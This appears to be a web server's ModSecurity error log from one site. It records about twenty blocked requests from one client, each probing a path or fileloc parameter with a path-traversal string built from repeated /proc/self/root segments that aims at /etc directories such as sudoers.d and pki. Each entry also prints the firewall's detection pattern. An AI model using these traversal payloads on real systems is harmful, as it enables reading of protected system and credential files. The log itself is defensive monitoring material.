[Fri Mar 20 07:16:50.385869 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:43248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ekuoXxyEfFpUF8f94TwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:16:51.679128 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:43250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ek7ninkcc-iUj5ApWDwAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:16:52.966889 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:43266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0elLninkcc-iUj5ApWEgAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:16:54.283652 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.243.128:43274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eljJ3M9BSuKP7CAYRkwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:16:58.156684 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:43282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0emOoXxyEfFpUF8f94UwAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:16:59.564162 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:54360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0em9a6ubjKNq_cu4bLHAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:00.884875 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:54368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0enPqxLDW4GITHUkTdAwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:02.462919 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:54370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0envqxLDW4GITHUkTdBgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:06.525291 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:54372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eota6ubjKNq_cu4bLJgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:07.839466 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:54382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eo9a6ubjKNq_cu4bLJwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:09.153677 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.243.128:54388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0epV1pVZ5mVmJwsFMmXAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:10.537396 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:41922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0epjJ3M9BSuKP7CAYRpQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:11.731683 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.243.128:41938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0epzJ3M9BSuKP7CAYRqgAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:15.255122 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:41948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eq_qxLDW4GITHUkTdHwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:17.659439 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:41964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0erfqxLDW4GITHUkTdJgAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:18.935287 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:41978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eruoXxyEfFpUF8f94YAAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:23.337040 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.243.128:46172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0esxCii7xarUs8iHZezgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:24.646113 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.243.128:46174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0etLninkcc-iUj5ApWHwAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:27.084614 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.243.128:46184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0etwF0L0L-SsrnPo5fXwAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:30.603759 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:46192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eugF0L0L-SsrnPo5fZQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:17:31.894401 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:45650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0eu11pVZ5mVmJwsFMmZwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
